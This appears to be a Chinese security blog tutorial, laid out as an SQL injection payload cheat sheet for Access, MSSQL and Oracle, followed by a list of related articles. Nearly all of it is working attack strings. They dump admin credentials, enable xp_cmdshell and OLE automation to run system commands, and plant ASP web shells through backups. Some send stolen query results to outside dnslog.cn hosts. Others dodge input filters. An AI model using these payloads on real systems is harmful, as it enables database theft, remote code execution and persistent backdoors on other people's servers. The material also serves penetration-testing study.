sql盲注特点_SQL注入第二章——access,mssql,oracle
一、Access注入
Access是轻量级数据库,特点是没有库,没有用户,单文件即可存储数据,在SQL注入时必须猜测表名和列名。
Access只有联合注入和布尔盲注。
1,联合注入
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=151 order by 1
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=151 order by 22
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 union select 1,2,password,4,5,6,7,8,9,10,11,12,13,14,admin,16,17,18,19,20,21,22 from admin
2,布尔盲注
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select * from admin)
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select password from admin)
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 len(password) from admin)=16
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,1,1)) from admin)=97
3,如何查询第二行的值
id=1513 union select 1,2,password,4,5,6,7,8,9,10,11,12,13,14,admin,16,17,18,19,20,21,22 from admin
id=1513 union select 1,2,password,4,5,6,7,8,9,10,11,12,13,14,admin,16,17,18,19,20,21,22 from admin where id=40
id=1513 union select 1,2,password,4,5,6,7,8,9,10,11,12,13,14,admin,16,17,18,19,20,21,22 from admin where admin not in ('admin')
id=1513 union select 1,2,(select top 1 password from (select top 2 * from admin order by 1 desc)),4,5,6,7,8,9,10,11,12,13,14, (select top 1 admin from (select top 2 * from admin order by 1 desc)),16,17,18,19,20,21,22 from admin
4,access猜列名的一些特殊解法
利用having爆列
select id,admin,password from admin where id=1 group by 1 having 1=1
select id,admin,password from admin where id=1,id group by 1 having 1=1
select id,admin,password from admin where id=1 group by 1,id having 1=1
select id,admin,password from admin where id=1 group by 1,id,admin having 1=1
select * from admin where id=1 having sum(1)=1
偏移注入,需要猜到一个列名,一般是id
id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin
id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16, * from admin
id=1513 union select 1,2,3,4,5,6,7,8,9,10, * from (admin as a inner join admin as b on a.id=b.id)
id=1513 union select 1,2,3,4,5,6,7,8,9,10,a.id,* from (admin as a inner join admin as b on a.id=b.id)
id=1513 union select 1,2,3,4,5,6,7,8,9,10,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
id=1513 union select 1,2,3,4,* from ((admin as a inner join admin as b on a.id=b.id)inner join admin as c on a.id=c.id)
移位溢注
id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16, * from admin
id=1513 union select 1,2,3,4,5,6,7,8,9,admin.*,16,17,18,19,20,21,22 from admin
id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,admin.*,19,20,21,22 from admin
联合使用,必须总列数超过admin列数的1/4,上述条件不满足
select 1,2,3,4,5,6,a.*,* from (admin as a inner join admin as b on a.id=b.id)
5,一些tips
access空白符,%20,%09,%0A,%0C,%0D
没有注释,但是有注释符号,%16,%00
select(password)from(admin)
select[password]from[admin]
select`password`from`admin`
IIS特殊之处
允许出现%,比如uni%on select
允许Unicode编码,比如%u0075%u006eion select
这里和和json格式类似,{"id":"u0031"}
双参数则用逗号拼接,id=1&id=2则为id=1,2,联合注入时可以利用
而mysql可以这样id=1 and/*&id=*/1=1
直连导出,备份getshell
select * into [a] in 'E:1.asp;.xls' 'excel 4.0;' from admin
如果数据库文件(.mdb)可解析,在任意值插入【┼攠數畣整爠煥敵瑳∨≡┩愾】,可以解析成<%eval request ("a")%>
无select注入
id = 39 and asc(mid(dfirst("password","admin"),1,1))=97
select dfirst(1,"admin")
select dfirst("password","admin")
select dfirst("[password]","[admin]","id=40")
select dlast("[password]","[admin]")
此外还有dlookup,dmin,dmax,dcount可用
其他davg,dsum,DStDev,DStDevP,DVar,DVarP只能数字类型
其他字符串比较
id = 39 and instr(dfirst("[password]","[admin]","id=40"),'a')
id = 39 and instr(dfirst("[password]","[admin]","id=40"),'a48e190fafc')
二、mssql注入
1,联合注入
http://127.0.0.1/1.aspx?id=1 order by 4
http://127.0.0.1/1.aspx?id=-1 union select 1,2,3,4
http://127.0.0.1/1.aspx?id=-1 union all select null,null,null,null
http://127.0.0.1/1.aspx?id=-1 union all select null,db_name(),null,null
查库,前六个都是系统库
(select name from master.dbo.sysdatabases where dbid=7)
指定test库查第一个表
(select top 1 name from test.dbo.sysobjects where xtype='U')
查当前库第一个表
(select top 1 name from sysobjects where xtype='U')
查当前库第二个表
(select top 1 name from sysobjects where xtype='U' and name not in ('admin'))
查当前库所有表
(select name from sysobjects where xtype='U' FOR XML PATH(''))
查列
(select top 1 name from syscolumns where id=object_id('admin'))
用|隔开查所有列
(select '|'%2bname%2b'|' from syscolumns where id=object_id('admin') FOR XML PATH(''))
快速变化0来查列
(select top 1 name from syscolumns where id=object_id('admin') and name not in (select top 0 name from syscolumns where id=object_id('admin')))
查所有值
(select password+username from admin FOR XML PATH(''))
mysql方式查表列
(select top 1 table_name from information_schema.tables)
(select top 1 column_name from information_schema.columns where table_name='admin')
注:子查询如果无法使用,可能需要带入exists()函数
2,报错注入
mssql非常容易报错注入,只需要把字符串和数字比较即可
http://127.0.0.1/1.aspx?id=@@version
http://127.0.0.1/1.aspx?id=1 and @@version=1
http://127.0.0.1/1.aspx?id=1 and 1=convert(int,@@version)
http://127.0.0.1/1.aspx?id=1 and 1=cast(@@version as int)
http://127.0.0.1/1.aspx?id=1%2bUSER_NAME(@@version)
注: USER_NAME()可被SUSER_NAME() PERMISSIONS() DB_NAME()
以及FILE_NAME() TYPE_NAME() COL_NAME()代替
3,盲注
布尔盲注
http://127.0.0.1/1.aspx?id=1 and ascii(substring((select user),1,1))=100
时间盲注
select * from admin where id = 1 if 1=2 WAITFOR DELAY '0:0:5'
http://127.0.0.1/1.aspx?id=1;if(ascii(substring((select user),1,1)))=100 WAITFOR DELAY '0:0:5'
dnslog注入,必须堆叠,必须sa
原理是用xp_subdirs,xp_dirtree, xp_fileexist,读取smb共享域名。也有用OpenRowset()和OpenDatasource()的办法,这两个函数为远程加载其他mssql数据库,默认关闭。
declare @host varchar(1024);
select @host=convert(varchar(1024),db_name())+'.vj0r9q.dnslog.cn';
exec('master..xp_subdirs "'+@host+'"');
或者
exec('master..xp_dirtree "'+@host+'"');
exec('master..xp_fileexist "'+@host+'test"');
dnslog也有无需堆叠的方法
and exists(select * from fn_xe_file_target_read_file('C:Windowswin.ini',''+(select user)+'.a72ita.dnslog.cn1.xem',null,null))
and exists(select * from fn_get_audit_file(''+(select user)+'.a72ita.dnslog.cn1.xem',null,null))
and exists(select * from fn_trace_gettable(''+(select user)+'.xrjff0.dnslog.cn1.trc',null))
4,堆叠注入
mssql默认支持堆叠注入,所以一旦有注入相当于直连数据库,直接进行增删改查,如果有sa权限,还可以利用扩展进行进一步利用。
堆叠注入,可以用declare和exec进行无select注入
declare @s varchar(2000) set @s=0x73656C6563742031 exec(@s)
5,堆叠注入下的扩展运用
xp_cmdshell,命令执行,高版本默认关闭,但可以打开
Exec sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;
Exec master.dbo.xp_cmdshell 'whoami';
无需堆叠
id=1 if 1=1 execute('exec sp_configure ''show advanced options'',1;reconfigure;exec sp_configure ''xp_cmdshell'', 1;reconfigure;exec xp_cmdshell''whoami''');
openrowset 2005以后默认关闭
exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'Ad Hoc Distributed Queries',1;reconfigure;
select * from openrowset('sqloledb','dsn=locaserver;trusted_connection=yes','set fmtonly off exec master..xp_cmdshell ''calc''')
select x from OpenRowset(BULK 'C:Windowswin.ini',SINGLE_CLOB) R(x)
sp_OACreate和sp_oacreate,命令执行,文件操作,无回显
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'show advanced options', 0;
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:windowssystem32cmd.exe /c whoami >D:1.txt'
DECLARE @Result int;DECLARE @FSO_Token int;EXEC @Result = sp_OACreate 'Scripting.FileSystemObject', @FSO_Token OUTPUT;EXEC @Result = sp_OAMethod @FSO_Token, 'DeleteFile', NULL, 'D:1.txt';EXEC @Result = sp_OADestroy @FSO_Token;
declare @aa int;exec sp_oacreate 'scripting.filesystemobject', @aa out;exec sp_oamethod @aa, 'moveFile',null,'D:1.txt', 'D:2.txt';
declare @aa int;exec sp_oacreate 'scripting.filesystemobject', @aa out;exec sp_oamethod @aa, 'moveFile',null,'D:1.txt', 'D:2.txt';
declare @o int;exec sp_oacreate 'scripting.filesystemobject', @o out;exec sp_oamethod @o, 'copyfile',null,'D:1.txt' ,'D:2.txt';
declare @o int;exec sp_oacreate 'Shell.Application', @o out;exec sp_oamethod @o, 'ShellExecute',null,'C:windowssystem32calc.exe';
Agent Job执行命令
USE msdb;
EXEC dbo.sp_add_job @job_name = N'test_powershell_job1';
EXEC sp_add_jobstep @job_name = N'test_powershell_job1', @step_name = N'test_powershell_name1', @subsystem = N'PowerShell', @command = N'c:windowssystem32cmd.exe /c whoami >c:1.txt', @retry_attempts = 1, @retry_interval = 5 ;
EXEC dbo.sp_add_jobserver @job_name = N'test_powershell_job1';
EXEC dbo.sp_start_job N'test_powershell_job1';
CLR程序集
MSSQL使用CLR程序集来执行命令 - 先知社区
沙盒执行命令(可能仅限低版本)
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftJet4.0Engines','SandBoxMode','REG_DWORD',1
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:windowssystem32iasdnary.mdb','select shell("whoami")')
sp_makewebtask(仅限低版本)
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Web Assistant Procedures',1;RECONFIGURE;
exec sp_makewebtask 'D:1.asp','select''<%execute(request("a"))%>'' ';
xp_dirtree和xp_subdirs,列文件,xp_fileexist确定文件是否存在
execute master..xp_dirtree 'c:',1,1
execute master..xp_subdirs 'c:'
execute master..xp_fileexist 'D:test.txt'
xp_regenumvalues,xp_regread,xp_regwrite,xp_regdeletevalue,xp_regdeletekey,注册表操作。
exec xp_regenumvalues'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsCurrentVersionRun'
EXEC master..xp_regenumvalues 'HKEY_CURRENT_USER','Control PanelInternational','sCountry';
sp_helpextendedproc,查看全部扩展
EXEC master..sp_helpextendedproc
xp_availablemedia,查看驱动器
exec master..xp_availablemedia
xp_logininfo,xp_enumgroups,查看计算机用户和组
exec xp_logininfo
sp_who2,查看登录账户
EXEC master..sp_who2
sp_addlinkedserver和sp_addlinkedsrvlogin
可登陆其他mssql和Oracle
6,文件读取和写入
BULK INSERT文件读取
create table #testtable(context ntext);BULK INSERT #testtable FROM 'D:/test.txt' WITH (DATAFILETYPE = 'char',KEEPNULLS);select * from #testtable;drop table #testtable;
数据库备份
create table [bin_cmd]([cmd] [image]);declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup database @a to disk=@s;insert into [bin_cmd](cmd)values('<%execute/**/(request(chr(35)))%>');declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='E:bin.asp' backup database @b to disk=@t WITH DIFFERENTIAL,FORMAT;drop table [bin_cmd];
日志备份
create table [bin_cmd]([cmd] [image]);declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup log @a to disk=@s;insert into [bin_cmd](cmd)values('<%execute/**/(request(chr(35)))%>');declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='e:1.asp' backup log @b to disk=@t with init,no_truncate;drop table [bin_cmd];
7,一些tips
mssql自带函数
@@version system_user suser_sname() user db_name() host_name()
mssql空白符
%01-%20都为空白符,--和/**/为注释,%00也可充当注释符
其他方式
id=0xunion selectNnull,null,null,null from.admin
避免使用引号
(select top 1 name from syscolumns where id=object_id('admin'))
(select top 1 name from syscolumns where id=object_id(char(97)+char(100)+char(109)+char(105)+char(110)))
爆出当前完整语句
id=1 union select null,(select text from sys.dm_exec_requests cross apply sys.dm_exec_sql_text(sql_handle)),null,null
三、oracle注入
1,联合注入
必须使用null,select必须带一个虚拟表 from dual
http://127.0.0.1:81/oracle.php?id=1 order by 3
http://127.0.0.1:81/oracle.php?id=-1 union select null,(select user from dual),null from dual
当前库名
select name from v$database
ip地址,ipv6
select utl_inaddr.get_host_address from dual
用户权限
select privilege from session_privs where rownum=1
查库
select owner from all_tables where rownum=1
查其他库
select owner from all_tables where rownum=1 and owner <>'SYS'
查第一个表
select table_name from user_tables where rownum=1
快速查询第二个表
select table_name from (select rownum r, table_name from user_tables order by table_name) WHERE r=2
查询第一个列
select column_name from user_tab_columns where rownum=1 and table_name='admin'
查询第一个值
select concat(username,password) from admin where rownum=1
select username||password from admin where rownum=1
2,报错注入
oracle报错注入也很简单,和1比较或者is not null即可
and 1=utl_inaddr.get_host_name((select user from dual))
and 1=ctxsys.drithsx.sn(1,(select user from dual))
and 1=ordsys.ord_dicom.getmappingxpath((select user from dual),user,user)
and (select dbms_xdb_version.checkin((select user from dual)) from dual) is not null
and (select upper(XMLType(chr(60)||chr(58)||(select user from dual)||chr(62))) from dual) is not null
and (select dbms_xdb_version.makeversioned((select user from dual)) from dual) is not null
and (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not null
and (select dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual) is not null
3,盲注
布尔盲注,decode和if一样
and 6=length(user)
and 83=(select ascii(substr((select user from dual),1,1)) from dual)
and 1=(select decode(substr((select user from dual),1,1),chr(83),1,0) from dual)
时间盲注
and 1=(select decode(substr((select user from dual),1,1),chr(83),DBMS_PIPE.RECEIVE_MESSAGE(CHR(78),2),0) from dual)
and 1=(select decode(substr((select user from dual),1,1),chr(83),(select count(*) from all_objects),0) from dual)
(select count(*) from all_objects)是类似笛卡尔积的高耗时操作,如果时间不明显,可以(select count(*) from all_objects)||(select count(*) from all_objects)加倍时间
dnslog盲注
and utl_http.request('http://'||(select user from dual)||'.0n7kdm.dnslog.cn/')=1
and UTL_INADDR.GET_HOST_ADDRESS((select user from dual)||'.7vkm67.dnslog.cn')=1
4,oracle tips
Oracle空白符%00 %0A %0D %0C %09 %20
注释,同样支持/**/和--
避免使用引号
and user='SYSTEM'
and user=chr(83)||chr(89)||chr(83)||chr(84)||chr(69)||chr(77)
上篇——珂字辈:sql注入第一章——mysql
觉得还不错的可以关注一下公众号——珂技知识分享,有些渗透实例会发布在上面。
sql盲注特点_SQL注入第二章——access,mssql,oracle相关推荐
- sql盲注特点_SQL注入介绍及分类解读
SQL全称是Structured Query Language,是一种结构化的查询语言,用于与数据库进行交互并能够被数据库解析.SQL注入攻击是一种常见的注入攻击类型.攻击方式在用户与程序进行交互时发 ...
- sql盲注 解决_sql盲注-和sql盲注相关的内容-阿里云开发者社区
<白帽子讲WEB安全>学习笔记之第7章 注入攻击 第7章 注入攻击 SQL注入的两个条件:1,用户可以控制输入:2,原本执行的SQL语句并接了用户输入的数据. 7.1 sql注入 SQL注 ...
- sql盲注特点_sql盲注讲解
盲注 有时候,开发人员不会把数据库报错信息显示在前端页面,这样就使我们想要通过union注入或报错注入的攻击方式难以实现. 当不显示报错信息的时候,我们还可以通过盲注的方式来对数据库进行注入攻击. 盲 ...
- SQL盲注之时间注入
1.利用sleep() 函数进行注入 payload:and if(ascii(substr(database(),1,1))=115,1,sleep(5))%23 2.当错误的时候会有5秒的时间延时 ...
- python脚本自动化盲注_三、基于报错型注入和sql盲注的自动化实现
通过前面payload的构造,不难发现,对于报错型注入和布尔注入(sql盲注)纯手工注入的效率是非常慢的.这些payload语句虽然复杂,但大部分内容都是相同的,因此,一言不合就写了个脚本自动化注入, ...
- SQL注入进阶:掌握布尔盲注和延时注入攻击技巧
数据来源 一.什么是盲注? 盲注是指一种利用应用程序漏洞进行的攻击技术,攻击者通过在输入参数中注入恶意代码或数据来探测.提取和修改应用程序的敏感数据.它通常用于测试 Web 应用程序的安全性,并且可能 ...
- mysql 时间盲注语句,sql注入学习记录(5)-基于时间延迟的SQL盲注
上次说到了sql注入中的基于报错盲注的基本的方法. 今天说一说报错盲注 基于时间延时的SQL盲注 使用时间延时注入的场景: 1.不能使用union select 联合查询方式注入 2.有些网站没有回显 ...
- sql注入攻击与防御第二版读书笔记二——SQL盲注利用
寻找并确认SQL盲注 强制产生通用错误 注入带副作用的查询 如 mssql waitfor delay '0:0:5' mysql sleep() 拆分与平衡 5 -> 7-2 常见SQL盲注场 ...
- DVWA下的SQL注入与SQL盲注
一.SQL注入 SQL注入是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作, ...
最新文章
- html5调用系统声音1s响一次_HTML5声音录制/播放功能的实现代码
- jquery--call()amp;apply()函数
- 「Vue」vue生命周期
- iPhone放大模式详解
- 练习:写一个脚本,完成以下任务
- 网络连接数4000多正常吗_怀孕36周时胎儿发育情况是怎样的?胎儿体重有4斤多正常吗?...
- Linux配置防火墙,开启80端口、3306端口
- 2018-2019-2 网络对抗技术 20165322 Exp5 MSF基础应用
- 如何保障“双11”期间亿万买家和卖家愉快地聊天
- html帮助文档看不了,Service Log按照文档设置之后,在web页面看不到,帮助文档的图片有点问题(看不到了),能不能处理一下...
- R语言制作长三角城市群空间权重矩阵及作图显示
- 在线英文翻译中文比较
- win10开机密码忘记怎么办|win10登陆密码忘记解决方法
- 北京信息科技大学计算机科学与技术研究生,2020年北京信息科技大学计算机科学与技术考研经验分享...
- 数据人必会的Excel|掌握32个Excel小技巧,成为效率达人(一)
- 仁人帮探索大数据技术
- 利用pandas拆分单元格并进行分组聚合
- 左连接,右连接,内连接及全连接区别
- openwrt - 入门( uHTTPd, opkg, uci, luci, mtd等)
- 国产化7K325T板卡学习资料: 基于国产化Ch-7K325T 的 FMC接口PCIe卡 国产化板卡
热门文章
- 我的erlang TCP服务器
- 初学python,分享一个简单的Excel文档合并工具
- MySQL Workbench
- 数据库设计中的14个技巧
- lnmp/nginx系统真正有效的图片防盗链完整设置详解
- 熵增学院-Anders-剑走偏锋,了解Spring Boot内部Servlet容器
- 面试集锦(十六)架构设计
- C#使用Xamarin开发可移植移动应用(1.入门与Xamarin.Forms页面),附源码
- 使用Python+Qt时解决QTreeWidget中的内容超出边界后自动隐藏的问题
- 动态生成的DIV加上DWZ后如何分页的问题